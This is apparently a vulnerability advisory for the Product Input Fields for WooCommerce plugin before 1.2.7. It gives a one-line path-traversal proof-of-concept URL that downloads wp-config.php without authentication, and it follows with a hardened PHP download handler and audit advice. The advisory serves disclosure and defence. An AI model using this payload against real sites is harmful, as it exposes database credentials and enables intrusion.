Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
Description
The handle_downloads() function, hooked to admin_init, performs no authorisation check. Because admin_init also fires for requests to admin-post.php from visitors who are not logged in, an unauthenticated user could supply a path traversal payload in the alg_wc_pif_download_file parameter and download arbitrary files from the site (for example wp-config.php).
Proof of Concept
/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php
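The following is an added example of how a download handler hooked to admin_init can be hardened against both failures described above (missing authorisation and path traversal). It is not the plugin's code or its vendor's fix; the function and directory names prefixed pif_example_ are hypothetical, and the only identifiers taken from this page are the admin_init hook and the alg_wc_pif_download_file parameter.

```php
<?php
// Added example, not the plugin's code. Names prefixed pif_example_ are hypothetical.

// Hypothetical shape of the vulnerable pattern: no auth check, and the raw
// parameter is joined onto a base directory, so "../../wp-config.php" escapes it.
function pif_example_vulnerable_path( $base_dir, $requested ) {
    return $base_dir . '/' . $requested;
}

// Hardened path resolution: strip any directory component, resolve symlinks,
// and confirm the result still lives inside $base_dir. Returns null on failure.
function pif_example_resolve_download_path( $base_dir, $requested ) {
    $name = basename( (string) $requested );       // drops "../" and slashes
    if ( '' === $name || '.' === $name || '..' === $name ) {
        return null;
    }
    $real_base = realpath( $base_dir );
    $real_path = realpath( $real_base . DIRECTORY_SEPARATOR . $name );
    if ( false === $real_base || false === $real_path ) {
        return null;
    }
    // Prefix check with the separator so "/uploads2" cannot pass as "/uploads".
    if ( 0 !== strpos( $real_path, $real_base . DIRECTORY_SEPARATOR ) ) {
        return null;
    }
    return $real_path;
}

add_action( 'admin_init', 'pif_example_handle_downloads' );

function pif_example_handle_downloads() {
    if ( ! isset( $_GET['alg_wc_pif_download_file'] ) ) {
        return;
    }

    // 1. Authorisation. admin_init fires on admin-post.php for anonymous
    //    visitors too, so the hook itself says nothing about who is calling.
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }

    // 2. CSRF: the download link must carry a nonce issued for this action.
    $nonce = isset( $_GET['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'pif_example_download' ) ) {
        wp_die( 'Invalid request', '', array( 'response' => 400 ) );
    }

    // 3. Path confinement to one dedicated directory under wp-content/uploads.
    $uploads  = wp_upload_dir();
    $base_dir = trailingslashit( $uploads['basedir'] ) . 'pif_example_uploads';
    $path     = pif_example_resolve_download_path( $base_dir, wp_unslash( $_GET['alg_wc_pif_download_file'] ) );
    if ( null === $path || ! is_file( $path ) ) {
        wp_die( 'File not found', '', array( 'response' => 404 ) );
    }

    // 4. Serve as an attachment under a sanitised name.
    header( 'Content-Type: application/octet-stream' );
    header( 'Content-Disposition: attachment; filename="' . sanitize_file_name( basename( $path ) ) . '"' );
    header( 'Content-Length: ' . filesize( $path ) );
    readfile( $path );
    exit;
}
```

The capability check and the nonce close the authorisation gap; the resolver closes the traversal independently, so a future change to either check alone does not reopen the whole issue. When auditing a plugin for this class of bug, look for readfile(), file_get_contents() or header('Content-Disposition') reachable from admin_init, init or admin-post actions without a current_user_can() call on the same path.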
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Jerome Bruandet (nintechnet)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-08-03
Added
2020-08-03
Last Updated
2023-06-08